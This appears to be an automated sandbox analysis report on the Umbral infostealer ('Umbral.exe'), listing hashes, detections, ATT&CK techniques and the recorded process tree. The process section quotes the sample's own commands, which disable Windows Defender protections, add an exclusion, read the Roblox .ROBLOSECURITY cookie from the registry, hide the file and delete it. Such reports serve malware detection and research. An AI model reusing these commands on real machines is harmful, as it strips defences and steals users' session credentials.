Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/03/2025, 20:17
Behavioral task
behavioral1
Sample
Umbral.exe
Resource
win7-20240903-en
General
-
Target
Umbral.exe
-
Size
229KB
-
MD5
fdb6c9cdf5605efda3e45942dad869d4
-
SHA1
8022afe157b98ad5fd5ead6f17ce35caff40b168
-
SHA256
bea3c8ebdb0c815aff349ef6ad6f0d92751ae62e4ced9ac2c68582d4e9d1c0af
-
SHA512
434a552c3dbdf7024f4a557ce9f01f755037aa303da03ed7752c9d1acd6c5fa050deef34983c7f491237a5c7adb3317db279b6e8e0bd3dab8bc0547dc031455e
-
SSDEEP
6144:lloZM+rIkd8g+EtXHkv/iD4ggxVFzQEbsCzFQMpf7b8e1mAUi:noZ1L+EP8ggxVFzQEbsCzFQMpXz
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1628-1-0x00000000001F0000-0x0000000000230000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2652 powershell.exe 2288 powershell.exe 2608 powershell.exe 1992 powershell.exe -
Deletes itself 1 IoCs
pid Process 1008 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1008 cmd.exe 1200 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2532 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1200 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2652 powershell.exe 2288 powershell.exe 2608 powershell.exe 2224 powershell.exe 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1628 Umbral.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeIncreaseQuotaPrivilege 1672 wmic.exe Token: SeSecurityPrivilege 1672 wmic.exe Token: SeTakeOwnershipPrivilege 1672 wmic.exe Token: SeLoadDriverPrivilege 1672 wmic.exe Token: SeSystemProfilePrivilege 1672 wmic.exe Token: SeSystemtimePrivilege 1672 wmic.exe Token: SeProfSingleProcessPrivilege 1672 wmic.exe Token: SeIncBasePriorityPrivilege 1672 wmic.exe Token: SeCreatePagefilePrivilege 1672 wmic.exe Token: SeBackupPrivilege 1672 wmic.exe Token: SeRestorePrivilege 1672 wmic.exe Token: SeShutdownPrivilege 1672 wmic.exe Token: SeDebugPrivilege 1672 wmic.exe Token: SeSystemEnvironmentPrivilege 1672 wmic.exe Token: SeRemoteShutdownPrivilege 1672 wmic.exe Token: SeUndockPrivilege 1672 wmic.exe Token: SeManageVolumePrivilege 1672 wmic.exe Token: 33 1672 wmic.exe Token: 34 1672 wmic.exe Token: 35 1672 wmic.exe Token: SeIncreaseQuotaPrivilege 1672 wmic.exe Token: SeSecurityPrivilege 1672 wmic.exe Token: SeTakeOwnershipPrivilege 1672 wmic.exe Token: SeLoadDriverPrivilege 1672 wmic.exe Token: SeSystemProfilePrivilege 1672 wmic.exe Token: SeSystemtimePrivilege 1672 wmic.exe Token: SeProfSingleProcessPrivilege 1672 wmic.exe Token: SeIncBasePriorityPrivilege 1672 wmic.exe Token: SeCreatePagefilePrivilege 1672 wmic.exe Token: SeBackupPrivilege 1672 wmic.exe Token: SeRestorePrivilege 1672 wmic.exe Token: SeShutdownPrivilege 1672 wmic.exe Token: SeDebugPrivilege 1672 wmic.exe Token: SeSystemEnvironmentPrivilege 1672 wmic.exe Token: SeRemoteShutdownPrivilege 1672 wmic.exe Token: SeUndockPrivilege 1672 wmic.exe Token: SeManageVolumePrivilege 1672 wmic.exe Token: 33 1672 wmic.exe Token: 34 1672 wmic.exe Token: 35 1672 wmic.exe Token: SeIncreaseQuotaPrivilege 2912 wmic.exe Token: SeSecurityPrivilege 2912 wmic.exe Token: SeTakeOwnershipPrivilege 2912 wmic.exe Token: SeLoadDriverPrivilege 2912 wmic.exe Token: SeSystemProfilePrivilege 2912 wmic.exe Token: SeSystemtimePrivilege 2912 wmic.exe Token: SeProfSingleProcessPrivilege 2912 wmic.exe Token: SeIncBasePriorityPrivilege 2912 wmic.exe Token: SeCreatePagefilePrivilege 2912 wmic.exe Token: SeBackupPrivilege 2912 wmic.exe Token: SeRestorePrivilege 2912 wmic.exe Token: SeShutdownPrivilege 2912 wmic.exe Token: SeDebugPrivilege 2912 wmic.exe Token: SeSystemEnvironmentPrivilege 2912 wmic.exe Token: SeRemoteShutdownPrivilege 2912 wmic.exe Token: SeUndockPrivilege 2912 wmic.exe Token: SeManageVolumePrivilege 2912 wmic.exe Token: 33 2912 wmic.exe Token: 34 2912 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2740 1628 Umbral.exe 31 PID 1628 wrote to memory of 2740 1628 Umbral.exe 31 PID 1628 wrote to memory of 2740 1628 Umbral.exe 31 PID 1628 wrote to memory of 2652 1628 Umbral.exe 33 PID 1628 wrote to memory of 2652 1628 Umbral.exe 33 PID 1628 wrote to memory of 2652 1628 Umbral.exe 33 PID 1628 wrote to memory of 2288 1628 Umbral.exe 35 PID 1628 wrote to memory of 2288 1628 Umbral.exe 35 PID 1628 wrote to memory of 2288 1628 Umbral.exe 35 PID 1628 wrote to memory of 2608 1628 Umbral.exe 37 PID 1628 wrote to memory of 2608 1628 Umbral.exe 37 PID 1628 wrote to memory of 2608 1628 Umbral.exe 37 PID 1628 wrote to memory of 2224 1628 Umbral.exe 39 PID 1628 wrote to memory of 2224 1628 Umbral.exe 39 PID 1628 wrote to memory of 2224 1628 Umbral.exe 39 PID 1628 wrote to memory of 1672 1628 Umbral.exe 41 PID 1628 wrote to memory of 1672 1628 Umbral.exe 41 PID 1628 wrote to memory of 1672 1628 Umbral.exe 41 PID 1628 wrote to memory of 2912 1628 Umbral.exe 44 PID 1628 wrote to memory of 2912 1628 Umbral.exe 44 PID 1628 wrote to memory of 2912 1628 Umbral.exe 44 PID 1628 wrote to memory of 712 1628 Umbral.exe 46 PID 1628 wrote to memory of 712 1628 Umbral.exe 46 PID 1628 wrote to memory of 712 1628 Umbral.exe 46 PID 1628 wrote to memory of 1992 1628 Umbral.exe 48 PID 1628 wrote to memory of 1992 1628 Umbral.exe 48 PID 1628 wrote to memory of 1992 1628 Umbral.exe 48 PID 1628 wrote to memory of 2532 1628 Umbral.exe 50 PID 1628 wrote to memory of 2532 1628 Umbral.exe 50 PID 1628 wrote to memory of 2532 1628 Umbral.exe 50 PID 1628 wrote to memory of 1008 1628 Umbral.exe 52 PID 1628 wrote to memory of 1008 1628 Umbral.exe 52 PID 1628 wrote to memory of 1008 1628 Umbral.exe 52 PID 1008 wrote to memory of 1200 1008 cmd.exe 54 PID 1008 wrote to memory of 1200 1008 cmd.exe 54 PID 1008 wrote to memory of 1200 1008 cmd.exe 54 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2740 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Views/modifies file attributes
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1992
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2532
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1200
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55d043b85b13532d97adc68866fb9b81d
SHA122f40fee965ed436aaffef0a9e75e71b0f0cc4ed
SHA256ec8172742afc05bb656f373b54f4d28def10bf8e9d4d3cfba2e51d602a319c76
SHA512722b6a0be3f24d329806c8fc8eca6de180627f78ebc81ccece8061521e4fcaeefdcb9ec81b1a71d2c9c147ce6c955b39b8833e35676967da792d0d60436c5c29